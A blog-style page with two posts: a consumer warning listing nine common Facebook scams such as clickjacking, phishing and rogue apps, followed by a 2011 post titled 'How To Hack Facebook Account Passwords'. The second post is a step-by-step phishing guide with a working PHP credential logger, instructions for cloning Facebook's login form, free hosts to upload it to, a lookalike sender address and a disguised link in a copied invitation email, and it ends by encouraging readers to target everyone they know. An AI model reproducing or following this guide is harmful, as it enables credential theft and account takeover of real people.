6/22/2011 The 9 Most Common Facebook Scams.

The 9 Most Common Facebook Scams.

Facebook recently launched a new security wall to block scammers, but many are worried these measures won’t stop spam from spreading and that determined con artists will simply find new ways to get at unsuspecting users.

We’ve all seen suspicious posts on Facebook–a friend’s curiously impersonal message that’s riddled with odd typos, the irresistible app offering a chance to see who has viewed your profile, and more. These scams are sometimes obvious and easy to avoid, other times nefarious and simple to fall for.

Despite Facebook’s security features, safe social networking rests in the user’s own hands.

We’ve put together a list of some of the most common Facebook scams and what happens if you fall for them. Take a look through the slideshow (below) and vote for the worst scam. Then, view our slideshow of 9 Facebook privacy tips to beef up your personal social networking safety.

Clickjacking:-

Clickjackers on Facebook entice users to copy and paste text into their browser bar by posting too-good-to-be-true offers and eye-catching headlines. Once the user infects his own computer with the malicious code, the clickjackers can take control of his account, spam his friends and further spread their scam. For example, clickjacking schemes hit Facebook soon after bin Laden’s death and spread like wildfire by purporting to offer users a glimpse at video or photos of bin Laden’s death.

Fake Polls Or Questionnaires

If you click on an ad or a link that takes you to questionnaire on a site outside Facebook, it’s best to close the page. When you complete a fake quiz, you help a scammer earn commission. Sometimes the quiz may ask you to enter your mobile number before you can view your results. If the scammers get your number, they could run up charges on your account.

Phishing Schemes

Phishers go after your credentials (username, password and sometimes more), then take over your profile, and may attempt to gain access to your other online accounts. Phishing schemes can be difficult to spot, especially if the scammers have set up a page that resembles Facebook’s login portal.

Phony Email Or Message

Facebook warns users to be on the lookout for emails or messages from scammers masquerading as “The Facebook Team” or “Facebook.” These messages often suggest “urgent action” and may ask the user to update his account. They frequently contain links to malware sites or virus-ridden attachments. They may even ask for your username and password. The best advice Facebook offers is to report the sender and delete the messages without clicking anything.

Money Transfer Scam

If a friend sent you a desperate-sounding Facebook chat message or wall post asking for an emergency money transfer, you’d want to help, right? Naturally. That’s what makes this scam so awful. The point is to get you to wire money to scammers via Western Union or another transfer service.

Fake Friend Request

Not all friend requests come from real people, despite Facebook’s safeguards against bots. Some Facebook accounts exist purely to establish broad connections for spamming or extracting personal data from users, so watch out whose friend requests you accept.

Fake Page Spam

Malicious pages, groups or event invitations aim to trick the user into performing actions that Facebook considers “abusive.” For instance, a fake invite might offer a prize if you forward it to all your friends or post spammy content on their walls. Sometimes a scammer will set up fake pages as a front for a clickjacking or phishing scheme.

Rogue Apps

Malicious apps are pretty common on Facebook these days. They can be a cover for phishing, malware, clickjacking or money transfer schemes. Oftentimes, the apps look convincingly real enough for users to click “Allow,” as they would do with a normal Facebook app. However, rogue apps use this permission to spread spam through your network of friends. For example, the recent “Facebook Shutdown” scam spread by claiming that Facebook would delete all inactive accounts except those that confirmed via app installation.

The Koobface Worm

The Koobface worm is getting on in years (it first appeared in late 2008) and has been mostly scrubbed from the site, but Facebook still warns users to look out for it. Koobface spreads across social networks like Facebook via posts containing a link that claims to be an Adobe Flash Player update. Really, the link downloads malware that will infect your computer, hijack your Facebook profile and spam all your friends with its malicious download link.


@Atul Purohit

4/23/2011 How To Hack Facebook Account Passwords

How To Hack Facebook Account Passwords

Every Body Question About how can i  hackfacebook? why doesn't my phisher work? how can i send my phisher?...
This is a step by step tutorial for face-book accounts.
...ONE...
Go to "www.facebook.com/login.php" and right click on some white space on the page and press "view source code". ALOT of text is gonna appear, copy it all to notepad.
TWO...
Now we need to change a few things in the code. So that the login button sends the info to our file instead of the facebook login. We do that by editing the action of the code. So press ctrl+f and search "action=" without the quotes. you should find this




The big red ring that circles the action= you have to change. You have to change it to 'action="next.php" '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as index.html

THREE...
Now that we changed the action to next.php, we should also make a "next.php". open up notepad again. And write this...
Quote
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Save this as "next.php"

Note: for security you should rename "passwords.txt" to something else.
now make a text file called "passwords.txt" or whatever you renamed the file to in the "next.php", leave this document blank...

FOUR...
Upload the 3 files  to a subdomain hosting site. THEY MUST SUPPORT .PHP! i suggest these: 110mb.com, spam.com justfree.com or 007sites.com. When you made an account you should upload the 3 files...

FIVE...
now we would like to send spoof emails out. To do that we should first make an email account. which starts with facebook@. or something that looks alike. like this FACEB0OK@hotmail.com or something like that. You should either use Gmail, Live, or hotmail. or you could get a mail like this "facebook@noreply.com" soemthing like that. but eventually that would cost. When your email is set go to step six...
SIX...
Copy the content of an original Facebook friendship invitation email and paste it into a new mail DONT SENT YET!
remove the hyperlink from this link:http:/www.facebook.com/n/?reqs.php
Mark it and push the Add hyperlink button



Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page.. Thats pretty Good Now i believe you are ready to send your spoof emails to everybody you know. and hopefully some of them will fall for it...